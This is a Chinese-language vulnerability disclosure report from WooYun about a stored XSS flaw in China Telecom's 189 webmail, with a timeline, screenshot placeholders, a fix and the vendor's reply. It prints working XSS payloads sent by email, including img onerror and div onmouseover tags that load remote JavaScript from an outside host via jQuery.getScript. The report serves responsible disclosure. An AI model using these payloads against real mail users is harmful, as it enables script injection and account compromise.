漏洞详情

披露状态:

2014-02-16: 细节已通知厂商并且等待厂商处理中
2014-02-21: 厂商已经确认,细节仅向厂商公开
2014-03-03: 细节向核心白帽子及相关领域专家公开
2014-03-13: 细节向普通白帽子公开
2014-03-23: 细节向实习白帽子公开
2014-04-02: 细节向公众公开

简要描述:

中国电信189邮箱存储型XSS

详细说明:

我们往189邮箱发一封邮件,内容如下:

<img/src=x onerror=alert(/img/)>
<div/onmouseover=alert(/div/) style="position:absolute;top:0;left:0;width:100%;height:100%">



161824042c01db4f59266cb94de2661a947d4fe3.jpg



收到邮件后,正文看上去一切正常。

a2.jpg



a3.jpg

只要点击回复、回复全部、转发

a4.jpg

任意一个就能触发img标签的XSS。

a5.jpg



鼠标移入红框区域即可触发一次div标签的XSS

a6.jpg



a7.jpg



这两处都可以调用外部js:

<img/src=x onerror=eval(setTimeout('jQuery.getScript(\'//00f.me/eS2Zid\')',5000))><div/onmouseover=eval(jQuery.getScript('//00f.me/eS2Zid')) style="position:absolute;top:0;left:0;width:100%;height:100%">



由于点击回复或转发后,新页面的img标签在jQ之前载入,所以img标签的XSS使用setTimeout()来延迟调用js。

a8.jpg

漏洞证明:

如上。

修复方案:

加强过滤和转义

版权声明:转载请注明来源 超威蓝猫@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-02-21 08:45

厂商回复:

转由CNCERT直接通报中国电信集团公司处置。

最新状态:

暂无


漏洞评价: